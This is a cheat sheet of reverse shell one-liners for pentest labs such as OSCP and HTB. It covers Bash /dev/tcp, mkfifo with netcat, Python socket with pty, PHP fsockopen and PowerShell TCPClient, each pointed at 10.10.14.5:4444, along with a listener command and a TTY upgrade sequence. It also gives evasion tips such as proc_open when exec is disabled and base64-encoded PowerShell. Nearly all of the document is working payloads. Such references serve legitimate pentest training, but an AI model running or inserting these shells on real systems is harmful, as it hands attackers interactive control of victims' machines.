2026 Authorized Reverse Shell One-Liner & Interactive PTY Stabilization Table
2026 Verified ReferenceDuring authorized penetration tests and OSCP/HTB labs, start a listener (`nc -lvnp 4444` or `rlwrap nc -lvnp 4444`), execute a runtime-matched outbound shell payload (Bash `/dev/tcp`, Python3 `pty.spawn`, or OpenBSD `mkfifo`), and immediately upgrade the raw socket to a full interactive TTY so `Ctrl+C`, tab-completion, and `sudo` work cleanly.
PTY Upgrade: python3 -c 'import pty;pty.spawn("/bin/bash")' → Ctrl+Z → stty raw -echo; fg → export TERM=xterm-256color| Target Runtime | Authorized Reverse Shell One-Liner | Binary / Socket Dependency | Operational Lab Note |
|---|---|---|---|
| Bash Built-in (/dev/tcp) | bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1' | GNU Bash (No external binary) | Wrap in bash -c '...' if parent shell is /bin/sh |
| Netcat OpenBSD (mkfifo Pipe) | rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f | nc (Works without -e flag) | Most reliable Netcat payload on modern Ubuntu/Debian |
| Python 3 Socket + Native PTY | python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.5",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' | python3 standard library | Spawns a pseudo-terminal immediately upon connect |
| PHP CLI / Web RCE (fsockopen) | php -r '$s=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");' | php-cli (FD #3 stream) | Use proc_open() if exec/system are in disable_functions |
| PowerShell TCPClient Stream | $c=New-Object Net.Sockets.TCPClient('10.10.14.5',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};... | powershell.exe / pwsh | Encode as UTF-16LE Base64 for powershell -enc |
| Interactive TTY Upgrade Sequence | python3 -c 'import pty;pty.spawn("/bin/bash")' ; stty raw -echo; fg | Host Terminal + Python/Script | Prevents accidental Ctrl+C from killing your shell |
